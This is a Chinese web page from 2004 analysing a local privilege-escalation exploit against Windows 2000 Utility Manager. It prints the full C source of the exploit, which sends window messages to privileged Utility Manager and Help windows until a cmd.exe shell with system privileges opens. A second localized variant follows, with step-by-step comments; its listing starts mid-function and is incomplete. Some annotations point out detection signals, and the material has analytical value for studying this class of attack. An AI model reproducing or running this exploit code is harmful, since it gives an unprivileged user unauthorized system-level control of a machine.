
W2kUtilManExp攻击程序分析

来源:互联摘选 日期:2004年07月29日 02:51:46
这个是源代码:
 
//by Cesar Cerrudo  sqlsec at yahoo.com
//Local elevation of privileges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
 
#include "stdio.h"
#include "windows.h"
 
 
/*
 * Entry point of the Utility Manager local privilege-escalation PoC for
 * Windows 2000 described in the header comments above.
 *
 * The program executes no elevated code of its own: it locates the
 * already-running "Utility manager" window and then drives it, the
 * "Windows Help" window and the Help file-open dialog with window
 * messages (PostMessage/SendMessage) until the dialog's shell view opens
 * cmd.exe; the header comment states that the resulting shell runs with
 * system privileges. This is the classic "shatter" pattern: cross-process
 * message injection into a more privileged interactive window. Every
 * step is paced by Sleep() (see the header note about tuning them) and
 * none of the FindWindow/GetDlgItem/WindowFromPoint results after the
 * first one is checked, so the sequence is inherently fragile and
 * timing-bound.
 *
 * From a defensive point of view the observable trail is an unprivileged
 * process sending WM_SETTEXT / WM_IME_KEYDOWN / WM_KEYDOWN /
 * WM_CONTEXTMENU / WM_CLOSE to windows it does not own, followed by
 * cmd.exe being spawned by a privileged process. NOTE(review): the page
 * dates this to 2004 and the accompanying text says it was tested on
 * Windows 2000 SP4; treat applicability to any later platform as
 * unverified.
 *
 * @param argc unused
 * @param argv unused
 * @return 0 in every path: after printing usage when "Utility manager"
 *         is not found, and after the message sequence has been sent.
 */
int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;   /* lHandle: Utility Manager, later the "Open" dialog; lHandle2: the child control currently being driven */
 POINT point;              /* screen point used to look up the popup context menu */
 char sText[]="%windir%\\system32\\cmd.ex?";   /* wildcard typed into the file-name box; matches cmd.exe without spelling out the extension */
 
//  run utility manager
// system("utilman.exe /start");
// Sleep(500);
 /* Left commented out in the original: the PoC expects Utility Manager
  * to have been started by the user (see the usage text below). */
 
 /* Utility Manager must already be running with exactly this caption
  * (FindWindow matches the window title literally); otherwise only the
  * usage text is printed. This is the only lookup that is checked. */
 lHandle=FindWindow(NULL, "Utility manager");   
 if (!lHandle) {
  printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then run UtilManExploit2.exe\n");
  return 0;
 }
 
 /* 0x313 is an undocumented message number; the original comment equates
  * it with right-clicking the taskbar button / Alt+Space (system menu). */
 PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button in the taskbar or Alt+Space Bar
 
 Sleep(100);
 
 /* 0x365 is labelled WM_COMMANDHELP by the original author; lParam is
  * passed as 0x1 because, per the same comment, it must be non-NULL.
  * Presumably this is what makes the "Windows Help" window appear,
  * since that is the next window looked up. */
 SendMessage(lHandle,0x365,NULL,0x1); //send WM_COMMANDHELP  0x0365  lParam must be <>NULL 
 Sleep(300);
 
 /* Press Return in the Help window; the FindWindow result is not checked. */
 SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN, 
VK_RETURN, 0);
 Sleep(500);
 
 
 // find open file dialog window
 /* "#32770" is the window class of standard dialog boxes; the caption
  * must be exactly "Open" (English UI). Not checked for NULL. */
 lHandle = FindWindow("#32770","Open");
 
 // get input box handle
 /* 0x47C is taken by the original author to be the control ID of the
  * file-name edit box; nothing here verifies it. */
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);
 
 // set text to filter listview to display only cmd.exe
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);
 
 // send return
 /* Return applies the wildcard as the dialog's file filter. Note that
  * WM_IME_KEYDOWN, not WM_KEYDOWN, is used for keystrokes in the dialog. */
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
 
 //get navigation bar handle
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 
 //send tab
 /* Tab from the navigation bar moves keyboard focus into the file list. */
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 /* The dialog hosts a shell view (class SHELLDLL_DefView) whose list view
  * is child control ID 1. Neither lookup is checked. */
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
 //get list view handle
 lHandle2 = GetDlgItem(lHandle2, 0x1);
 
 /* Typing c, m, d (virtual-key codes 0x43/0x4D/0x44) relies on the list
  * view's type-ahead selection to land on cmd.exe. */
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
 Sleep(500);
 
 //popup context menu
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);
 
 // get context menu handle
 /* No handle to the popup menu is available, so it is located by a fixed
  * screen coordinate (10,30). Whatever window is at that point receives
  * the next three keystrokes; nothing verifies that it is the menu. */
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);
 
 /* Two Down presses and Return activate a menu item; which item that is
  * depends entirely on the menu layout and is not checked. */
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
 
 /* Tear-down: close the dialog, then whatever window currently carries
  * the "Windows Help" caption (the original comment calls it an error
  * window), then Utility Manager itself. */
 SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
 Sleep(500);
 SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0);// close open error window
 SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0);// close utility manager
 return 0;
}
本人根据以上代码编译了一个小工具, 由于不是十分完善, 暂时不发布, 这里只对 UtilMan.exe 做一个简单的分析说明:
UtilMan.exe的新漏洞简单分析
该漏洞在2k+sp4下测试成功.
大概意思是:
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of privileges exploit for Windows Utility Manager
得到一个系统权限的shell

// Second variant of the same Utility Manager PoC, quoted from the body of
// main() only: the function header, the declarations of lHandle, lHandle2
// and point, and the #includes are not shown on the page. It differs from
// the listing above in how Help is opened (undocumented message 0x4D to
// Utility Manager, then WM_COMMAND 0x44D to the Help window) and in
// matching the window captions of a Chinese-localized Windows; FindWindow
// compares captions literally, so the caption strings below are specific
// to that UI language. As in the first listing, no lookup result is
// checked for NULL and each step is paced by Sleep().
char sText[]="%windir%\\system32\\cmd.ex?"; // not ".exe": a wildcard so the file list shows cmd.exe (see the Return keystroke below)
// Run Utility Manager (left commented out: it is expected to be running already)
//WinExec ("utilman.exe /start",SW_SHOW);
//Sleep(500);
// Open Help; this starts winhlp32.exe. Message 0x4D is undocumented; the
// author's guess is that it is equivalent to pressing F1.
SendMessage(FindWindow(NULL, "工具管理器"), 0x4D, 0, 0);
Sleep(500);
// Open the file-open dialog: in winhlp32.exe, 0x44D is the command ID of
// the File > Open menu item. Per the author this must be PostMessage,
// not SendMessage.
PostMessage(FindWindow(NULL, "Windows 帮助"), WM_COMMAND, 0x44D, 0);
Sleep(500);

// Get the file-open dialog handle ("#32770" is the dialog box class)
lHandle = FindWindow("#32770","打开");
// Get the handle of the file-name edit box in the dialog; its control ID is 0x47C
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);
// Set the file-name edit box to cmd.ex?
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);
// Send Return so the dialog's file list shows .ex? files; otherwise it
// lists .hlp files only, because by default only .hlp files can be opened.
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
// Get the handle of the toolbar on the left of the dialog (the large
// History / Desktop / My Documents icons); its window class is
// ToolbarWindow32
lHandle2 = GetDlgItem(lHandle, 0x4A0);
// Send Tab so keyboard focus moves to the file list control on the right
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);

Sleep(500);
// Get the handle of the dialog's child file-list control (the shell view)
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
// Get its SysListView32 child; control ID 1
lHandle2 = GetDlgItem(lHandle2, 0x1);
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
// "cmd" is sent so that the list selection lands exactly on cmd.exe;
// oddly, the author notes that typing c, m, d by hand does not work
Sleep(800);
// Open the context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);
// Obtain the context-menu handle from the current cursor position
// (in fact a fixed screen point, (10,30); nothing verifies that the
// window found there is the menu)
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down one item in the context menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down one more item; this lands on "Open"
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send Return
SendMessage (lHandle, WM_CLOSE,0,0); // close the file-open dialog
return(0);
}
在单机上运行此程序时, 以上操作是隐藏性的, 整个过程只有几秒钟时间。
至于它的利用条件, 有待进一步参考。
